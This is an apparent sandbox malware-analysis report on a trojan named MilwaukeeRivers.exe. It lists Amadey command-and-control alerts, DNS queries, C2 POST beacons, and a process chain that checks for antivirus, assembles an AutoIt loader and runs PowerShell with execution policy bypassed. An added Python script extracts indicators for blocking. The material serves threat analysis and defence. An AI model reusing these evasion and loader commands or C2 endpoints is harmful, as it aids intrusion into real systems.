Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\215655\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\

          Networking

          Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.16:49724 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.16:49726 -> 172.67.182.119:80
          Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49726 -> 172.67.182.119:80
          Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 172.67.182.119 80
          Source: unknownDNS query: name: rentry.co
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 152Cache-Control: no-cacheData Raw: 72 3d 42 39 33 41 39 39 36 30 31 32 41 43 34 33 43 45 46 39 37 45 31 44 43 45 31 34 43 38 36 36 38 33 34 38 44 33 34 34 30 38 39 33 32 36 37 30 41 37 36 36 35 44 39 42 34 36 41 41 31 39 43 44 44 35 38 43 34 38 43 46 38 42 32 39 35 32 37 38 46 37 45 42 43 42 30 37 35 41 39 36 33 34 46 34 44 39 43 34 31 32 35 31 37 45 46 45 41 37 35 39 36 36 36 41 35 35 39 32 44 46 42 42 31 46 37 31 41 44 41 41 43 33 31 33 44 41 37 35 34 43 35 30 42 46 37 30 42 38 35 42 Data Ascii: r=B93A996012AC43CEF97E1DCE14C8668348D34408932670A7665D9B46AA19CDD58C48CF8B295278F7EBCB075A9634F4D9C412517EFEA759666A5592DFBB1F71ADAAC313DA754C50BF70B85B
          Source: global trafficHTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: gardenhub-fitlife.comContent-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49711 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49715 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49713 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49714 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49720 -> 188.114.96.3:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49717 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49718 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49719 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49712 -> 104.21.32.51:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49721 -> 172.67.75.40:443
          Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49722 -> 188.114.97.3:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 identical events)
Source: global traffic | DNS traffic detected: DNS query: tkuIaWVNSUOHYBGsHHYaNMFgSmiW.tkuIaWVNSUOHYBGsHHYaNMFgSmiW
Source: global traffic | DNS traffic detected: DNS query: proggresinvj.cyou
Source: global traffic | DNS traffic detected: DNS query: cdn4.creative-habitat.shop
Source: global traffic | DNS traffic detected: DNS query: rentry.co
Source: global traffic | DNS traffic detected: DNS query: cdn2.creative-habitat.shop
Source: global traffic | DNS traffic detected: DNS query: cdn1.creative-habitat.shop
Source: global traffic | DNS traffic detected: DNS query: gardenhub-fitlife3.com
Source: global traffic | DNS traffic detected: DNS query: gardenhub-fitlife2.com
Source: global traffic | DNS traffic detected: DNS query: gardenhub-fitlife.com
Source: unknown | HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: gardenhub-fitlife.com; Content-Length: 4; Cache-Control: no-cache; Data Raw: 73 74 3d 73; Data Ascii: st=s
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49716 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49717 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.75.40:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49723 version: TLS 1.2
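The network rows above, reduced to the indicators an analyst would actually act on. This is an added example and not part of the Joe Sandbox report: the rows embedded in SAMPLE_ROWS are copied from this report, while the parsing, the hex-versus-ASCII cross-check of the POST body and the correlation are this example's own. Two caveats that the raw rows do not spell out: rule 2028371 is a JA3 client-fingerprint match at severity 3, the lowest of the ET priority levels, and the same fingerprint is produced by legitimate TLS stacks, so it corroborates the other findings rather than proving C2 on its own; and 104.21.0.0/16, 172.67.0.0/16 and 188.114.96.0/22 are Cloudflare ranges, so the domains, not the destination IPs, are the durable indicators.

```python
"""Turn the Joe Sandbox network rows above into a structured IOC set.

Added example, not part of the Joe Sandbox report. SAMPLE_ROWS reproduces a
handful of the report's own rows; everything else is this example's code.
"""
import re
from collections import Counter

# A subset of the report's network rows, embedded so the script runs offline.
SAMPLE_ROWS = """\
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49716 -> 104.21.32.51:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49720 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.16:49721 -> 172.67.75.40:443
Source: global traffic | DNS traffic detected: DNS query: proggresinvj.cyou
Source: global traffic | DNS traffic detected: DNS query: rentry.co
Source: global traffic | DNS traffic detected: DNS query: gardenhub-fitlife.com
Source: unknown | HTTP traffic detected: POST /g9jvjfd73/index.php HTTP/1.1; Content-Type: application/x-www-form-urlencoded; Host: gardenhub-fitlife.com; Content-Length: 4; Cache-Control: no-cache; Data Raw: 73 74 3d 73; Data Ascii: st=s
Source: unknown | HTTPS traffic detected: 104.21.32.51:443 -> 192.168.2.16:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.16:49720 version: TLS 1.2
"""

ALERT_RE = re.compile(r"Suricata IDS: (\d+) - Severity (\d+) - (.+?) : (\S+) -> (\S+)")
DNS_RE = re.compile(r"DNS query: (\S+)")
HTTPS_RE = re.compile(r"HTTPS traffic detected: (\S+) -> (\S+) version: (.+)$")
HTTP_RE = re.compile(r"HTTP traffic detected: ([A-Z]+) (\S+) HTTP/1\.\d")
HEADER_RE = re.compile(r"(Host|Content-Length|Data Raw|Data Ascii): ([^;]+)")


def split_endpoint(ep):
    """'1.2.3.4:443' -> ('1.2.3.4', 443)."""
    ip, port = ep.rsplit(":", 1)
    return ip, int(port)


def parse_rows(text):
    """Parse report rows into alerts, DNS names, TLS sessions and HTTP requests."""
    out = {"alerts": [], "dns": set(), "https": [], "http": []}
    for line in text.splitlines():
        if m := ALERT_RE.search(line):
            sid, sev, msg, src, dst = m.groups()
            out["alerts"].append({"sid": int(sid), "severity": int(sev), "msg": msg,
                                  "src": split_endpoint(src), "dst": split_endpoint(dst)})
        elif m := DNS_RE.search(line):
            out["dns"].add(m.group(1))
        elif m := HTTPS_RE.search(line):
            srv, cli, ver = m.groups()
            out["https"].append({"server": split_endpoint(srv),
                                 "client": split_endpoint(cli), "version": ver})
        elif m := HTTP_RE.search(line):
            req = {"method": m.group(1), "path": m.group(2)}
            for name, value in HEADER_RE.findall(line):
                req[name] = value.strip()
            # Cross-check the sandbox's hex dump against its ASCII rendering
            # and the declared Content-Length before trusting the body.
            raw = bytes.fromhex(req.get("Data Raw", "").replace(" ", ""))
            req["body"] = raw.decode("ascii", "replace")
            req["body_consistent"] = (req["body"] == req.get("Data Ascii")
                                      and len(raw) == int(req.get("Content-Length", -1)))
            out["http"].append(req)
    return out


def summarize(parsed):
    """IOCs grouped the way a blocking or hunting ticket needs them."""
    tls_servers = {s["server"][0] for s in parsed["https"]}
    ja3_dsts = {a["dst"][0] for a in parsed["alerts"]}
    return {
        "rule_hits": Counter(a["sid"] for a in parsed["alerts"]),
        "dst_ips": Counter(a["dst"][0] for a in parsed["alerts"]),
        "domains": sorted(parsed["dns"]),
        # Servers that were both reached over TLS and tagged by the JA3 rule.
        "tls_servers_with_ja3_alert": sorted(tls_servers & ja3_dsts),
        # Hosts that received a cleartext POST: the only unencrypted beacon here.
        "http_post_hosts": sorted(r["Host"] for r in parsed["http"] if r["method"] == "POST"),
    }


if __name__ == "__main__":
    for key, value in summarize(parse_rows(SAMPLE_ROWS)).items():
        print(f"{key}: {value}")
```

Feed the whole report's rows instead of SAMPLE_ROWS and the output becomes the blocklist: the DNS names under `domains`, the POST URI and body under `http`, and the JA3 hits as supporting context.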
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\StormCups
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\AgePlants
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\EarlTowards
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\LakesDies
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\NycOperational
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Windows\MrnaWasher
Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\more.com | File created: C:\Windows\Tasks\MB Led SDK.job
Source: MilwaukeeRivers.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winEXE@114/21@13/31
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Roaming\Cpb_Docker\BIT7040.tmp
Source: C:\Windows\SysWOW64\explorer.exe | Mutant created: \Sessions\1\BaseNamedObjects\f5a43204a66445ad0e09c0db80eb910b
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2744:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File created: C:\Users\user\AppData\Local\Temp\nsx71EF.tmp
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe (2 identical events)
Source: MilwaukeeRivers.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\tasklist.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process (2 identical events)
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | File read: C:\Users\user\Desktop\MilwaukeeRivers.exe
Source: unknown | Process created: C:\Users\user\Desktop\MilwaukeeRivers.exe "C:\Users\user\Desktop\MilwaukeeRivers.exe"
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
Source: C:\Users\user\Desktop\MilwaukeeRivers.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Te Te.bat & Te.bat
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 215655
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "GeologicalAllowStoryVirtually" Commitments
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Started + ..\Spend + ..\Seek + ..\Etc + ..\Reliability + ..\Lingerie + ..\Washing g
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif Comparing.pif g
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | Process created: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe "C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe"
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | Process created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x"
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\RMT8RZ707CD4RCVVEW6RDPRIU.ps1"
Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pif | Process created: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe "C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe" "C:\Users\user\AppData\Local\Temp\LRAKKJ\Afflicted.a3x"
Source: C:\Users\user\AppData\Local\Temp\OHFHODKJNOQ3LDHM.exe | Process created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe | Process created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" (40 identical events)
Source: C:\Windows\SysWOW64\more.com | Process created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe (2 identical events)
Source: C:\Users\user\AppData\Local\Temp\LRAKKJ\AutoIt3.exe | Process created: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe "C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateCore.exe" (40 identical events)
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: apphelp.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: version.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: kernel.appcore.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: uxtheme.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: shfolder.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: windows.storage.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wldp.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: propsys.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: riched20.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: usp10.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: msls31.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: textinputframework.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: coreuicomponents.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: coremessaging.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: ntmarta.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: wintypes.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: textshaping.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: profapi.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: edputil.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: urlmon.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: iertutil.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: srvcli.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: netutils.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: sspicli.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: appresolver.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: bcp47langs.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: slc.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: userenv.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: sppc.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: onecorecommonproxystub.dll
          Source: C:\Users\user\Desktop\MilwaukeeRivers.exeSection loaded: onecoreuapcommonproxystub.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
          Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wsock32.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winmm.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mpr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wininet.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: iphlpapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: userenv.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: uxtheme.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: kernel.appcore.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: windows.storage.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wldp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: napinsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: pnrpnsp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: wshbth.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: nlaapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: mswsock.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: dnsapi.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winrnr.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: rasadhlp.dll
          Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: winhttp.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: ondemandconnroutehelper.dll
          Source: C:\Users\user\AppData\Local\Temp\215655\Comparing.pifSection loaded: webio.dll
